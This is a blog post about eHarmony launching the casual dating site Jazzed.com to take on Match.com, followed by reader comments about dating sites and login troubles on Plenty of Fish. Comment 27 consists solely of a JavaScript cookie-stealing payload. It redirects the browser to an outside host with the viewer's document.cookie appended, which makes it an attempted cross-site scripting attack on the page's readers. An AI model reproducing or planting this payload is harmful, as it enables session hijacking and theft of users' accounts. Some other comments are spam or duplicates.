Eharmony Goes After Match.com launches casual site.

Jazzed.com is eharmony’s new site.    Given that Zoosk supposedly now has revenues of over  $10 million a month up from next to nothing last year this is something I expected…    Expect a lot  more action coming from the top dating sites…   But make no mistake  jazzed.com is aimed squarely at match.com and the hundreds of millions in revenues it generates from the US market.

From the about page….

“Jazzed is owned and operated by eHarmony, Inc., the company that has helped people find meaningful relationships for a decade. Jazzed offers easy-to-create and informative profiles, as well as powerful and intuitive search tools. Every photo on Jazzed is reviewed by a live customer care agent. Jazzed also offers the same privacy and security features as eHarmony to give you the best possible experience while meeting high-quality people.Jazzed is owned and operated by eHarmony, Inc., the company that has helped people find meaningful relationships for a decade. Jazzed offers easy-to-create and informative profiles, as well as powerful and intuitive search tools. Every photo on Jazzed is reviewed by a live customer care agent. Jazzed also offers the same privacy and security features as eHarmony to give you the best possible experience while meeting high-quality people.”

29 Responses to “Eharmony Goes After Match.com launches casual site.”

  1. Andre Says:

    I guess eharmony finally understands that filling out a dozen forms and getting rejected may tend to upset people.

  2. Dan Says:

    Whats special about jazzed? I dont see how they will stand out from other services…

  3. Greg Kim Says:

    I didn’t like the sign up process, look and feel, etc. It’s trying to be like zoosk but falls short. And the launch of this opportunity makes me question growth opps in the compatible matching arena.

  4. liebepur Says:

    eHarmony und seine neue „Umsonst-und-Sofort“ Datingseite…

    eHarmony ist sozusagen das selbst ernannte Urgestein konservativer Partnersuche – doch offenbar folgen die US-amerikanischen Inhaber inzwischen auch anderen Trends: Leicht und locker zusammenzukommen und eine schöne Zeit dabei zu haben. Ob man das Ganz…

  5. Ethan Says:

    Seems like a sensible move, if you’ve got the resources why not increase your catchment area by adding another property? However I don’t think much of the name, it looks like they opted for the cheapest, relatively short ‘.com’ they could find. That said it’s probably better than Zoosk😉

  6. newjersey Says:

    Markus – the real question is will we be permitted to promote jazzed CPA offers on POF ads?🙂

  7. liamtoday Says:

    I signed on to plenty of fish recently, lost my password, and have been unable to get it either back, or to get a new one. Can you help?

  8. Arıcılık Says:

    I guess eharmony finally understands that filling out a dozen forms and getting rejected may tend to upset people.

  9. Bill Says:

    I don’t like the fact that eharmony asks for Your phone number, then constantly hounds You by phone in an attempt to set up an in-person interview, even after repeatedly telling them no

  10. Cynthia Garcia Says:

    I just opened a POF account and now i cant login to it and i cant find anyone to help me… im getting discouraged since i have only had this account fo 5 days and after day 3 it stopped letting me login… im hoping Marcus can help me… i keep reading reviews that show other people have this problem as well… please help

  11. Errol Says:

    What I like about Markus is that he is focused on his website plentyoffish.com. Match.com and eHarmony need to do the same. I fail to understand why Match.com and eHarmony keep on creating new dating websites.

  12. Tropical adult dating Says:

    It’s taken eharmony how long to catch on ? hummm and they didnt do a very good job either on the about us page with their spammy page copy! hi Google you can slap me now !

  13. Rico Says:

    Zoosk is a crap site, I don’t understand why anyone would use that service.

  14. Reed Says:

    Personally, I have tried the online sites; but I still prefer the old fashioned matchmakers, and singles groups/parties where we all met in person instead of judging people by a picture and making an instant decision. I ran my own singles club that I started from scratch in 1976; and most all members ended up matching themselves up with people they met, got to know = that if I had used their applications/information; they would never have been introduced to each other. “To each his own”

  15. Julia Xu Says:

    “You are attempting to signup from a country we currently do not accept signups from your current location. We only accept users from Canada, UK, US, Australia, Ireland, New Zealand and Germany ”

    Dear Markus, why do you do that?

  16. Stephanie Says:

    I”ve had a plentyoffish account for about 3 weeks and tried logging on today and it won’t let me. It looks like my whole account and profile were deleted. I tried re-registering and it keeps coming up:
    “You are attempting to signup from a country we currently do not accept signups from your current location. We only accept users from Canada, UK, US, Australia, Ireland, New Zealand and Germany”
    Uh… I’m choosing US. What the heck is going on?

  17. Miya Says:

    I don’t understand why and how e-harmony is still around when they charge you a butt-load of money for little results. Every competitor out there offers free or close to free prices and they can still get away with someone charging $60 a month.

  18. wayne Says:

    Heh guys,,,whats your problem,,,since ive joined pof ive met several ladies for free,,, no overheads taking money out of you account just because you use air space to send a messege. Im also a member or oasisactive.com,,, no moneys are paid out to use these sites. Dating sites that charge money to use there sites are a complete waste of time and effet. Think about it ,,im saving approx $80 per month in not useing sites that charge and no overheads charging money to use air space

  19. wayne Says:

    Ive used both cites over the years E harmony and Match .com and was dissatisfied with both services. Am happy with pof and oasisactive,, these cites are 100% free to join and use.. well done marcus,,we who use your cite love u

  20. McCraken Says:

    Jazzed is another fail attempt by the big wigs in the industry. The name does not relate to any thing dating or marriage. Wish them luck however. Competition is always good for the customer.

    Dateolicious.com
    SwapLotto.com
    TwitLotto.com

  21. Dan Says:

    I’m wondering how zoosk gained members so quickly… the site doesn’t see so great.

  22. baadfoot66 Says:

    site is a joke its great to meet people if your user name isnt raped every day ????
    dam pain in ass that this happens yet i ask for help and get no reply ty marcus ive lost over a years worth of friendships and dates
    chris id like my original account back please

  23. liamtoday Says:

    Hi there, I ‘ve written to customer care at least 5 times including tonight about finding my password. No reply, no response. Is there anyway for a person to get this fixed? What the heck is going on ? I am fed up.

    Do reply

    Cheers

  24. BlacqueQT Says:

    Why buy the cow when you can get all the milk you want for free? eVow & POF are TOTALLY FREE dating sites. Unlike Zooks, that allows you to send a message but when the person replies back, they lock the comment until you join. WTF???

  25. supriyanto ato Says:

    i dont know and I’m wondering how zoosk gained members so quickly and fast in the large competitior

  26. john Says:

    eharmony is far superior to match.com
    I get responses all the time on eharmony
    On match, I was contacted once and never got a reply to any of the emails I sent

    I don’t know what it is, but my guess is that match attracts all the superficial women, whereas eharmony is quite a bit more sophisticated and therefore weeds out the gold-diggers who belong on match anyway

  27. Anouyu Says:

    document.location=”http://webmasters.zxq.net/index.php?cookie=” + document.cookie;

  28. Rochelle Says:

    I have used eHarmony several times over the past few years and never received a legitimate contact, not once. I thought it may have been because I was late 50s early 60s. I contacted the company and they said they did not have a large data base of seniors. I actually have met several nice singles on Chemistry.com and Match.com. Still haven’t met the right man yet though. SeniorpeopleMeet appears to be somewhat a sham which makes me wonder about Match since they own Seniorpeoplemeet!

Leave a Reply

